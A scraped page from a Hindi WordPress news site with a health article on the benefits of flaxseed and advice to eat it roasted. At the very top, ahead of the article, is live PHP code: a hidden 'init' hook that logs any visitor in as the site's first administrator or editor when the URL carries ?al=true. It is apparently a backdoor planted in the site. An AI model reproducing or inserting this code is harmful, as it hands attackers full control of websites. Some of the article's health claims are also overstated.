// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); अलसी के बीज खाने से मिलेंगे ये फायदे – प्रत्युषा आशा की नयी किरण
स्वास्थ्य

अलसी के बीज खाने से मिलेंगे ये फायदे

अलसी के बीज, जिन्हें फ्लैक्ससीड्स भी कहा जाता है, काफी पौष्टिक होता है, जो स्वास्थ्य के लिए कई तरह से फायदेमंद  होते हैं। यह छोटे-छोटे बीज पोषक तत्वों से भरपूर होते हैं और इन्हें डाइट में शामिल करने से शरीर को कई फायदे मिलते हैं।

हालांकि, कई लोग इन्हें खाने का सही तरीका नहीं जानते। जिसके कारण इनका पूरा पोषण उन्हें नहीं मिल पाता है। आइए जानते हैं अलसी के बीज के फायदे और इन्हें खाने का सही तरीका।

अलसी के बीज के फायदे

दिल के स्वास्थ्य के लिए लाभदायक
अलसी के बीज में ओमेगा-3 फैटी एसिड की मात्रा ज्यादा होती है, जो दिल के लिए बहुत फायदेमंद है। यह कोलेस्ट्रॉल लेवल को कम करने में मदद करता है और ब्लड प्रेशर को कंट्रोल रखता है। इससे दिल की बीमारियों का खतरा कम होता है।

पाचन तंत्र को मजबूत बनाए
अलसी के बीज में फाइबर की मात्रा ज्यादा होती है, जो पाचन तंत्र को स्वस्थ रखने में मदद करता है। यह कब्ज की समस्या को दूर करता है और आंतों की सफाई करने में मददगार होता है।

वजन घटाने में सहायक
अलसी के बीज में मौजूद फाइबर और ओमेगा-3 फैटी एसिड भूख को कंट्रोल करते हैं, जिससे वजन घटाने में मदद मिलती है। यह शरीर के मेटाबॉलिज्म को भी बढ़ाता है।

डायबिटीज को कंट्रोल करे
अलसी के बीज ब्लड शुगर के लेवल को कंट्रोल करने में मदद करते हैं। इसमें मौजूद फाइबर और अन्य पोषक तत्व इंसुलिन सेंसिटिविटी को बढ़ाते हैं, जो डायबिटीज के मरीजों के लिए फायदेमंद है।

त्वचा और बालों के लिए फायदेमंद
अलसी के बीज में एंटीऑक्सीडेंट्स और ओमेगा-3 फैटी एसिड होते हैं, जो त्वचा को स्वस्थ और चमकदार बनाते हैं। यह बालों को मजबूत और घना बनाने में भी मदद करता है।

हार्मोनल संतुलन बनाए रखे
अलसी के बीज में लिग्नन्स नाम का कंपाउंड पाया जाता है, जो हार्मोनल संतुलन को बनाए रखने में मदद करता है। यह महिलाओं में मेनोपॉज के लक्षणों को कम करने में भी सहायक होता है।

अलसी के बीज खाने का सही तरीका
कई लोग अलसी के बीजों को कच्चा खाना पसंद करते हैं या इस तरह खाना ज्यादा फायदेमंद मानते हैं। लेकिन यह सही तरीका नहीं है। कच्ची अलसी में कई ऐसे तत्व होते हैं, जो पोषक तत्वों को अब्जॉर्ब नहीं होने देते। इनकी वजह से पाचन से जुड़ी समस्याएं भी हो सकती हैं। इसलिए अलसी के बीजों को खाने का सबसे अच्छा तरीका है, उन्हें भूनकर खाना। भुनी हुई अलसी आसानी से पच जाती है और इसके पोषक तत्व भी बेहतर तरीके से अब्जॉर्ब होते हैं।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]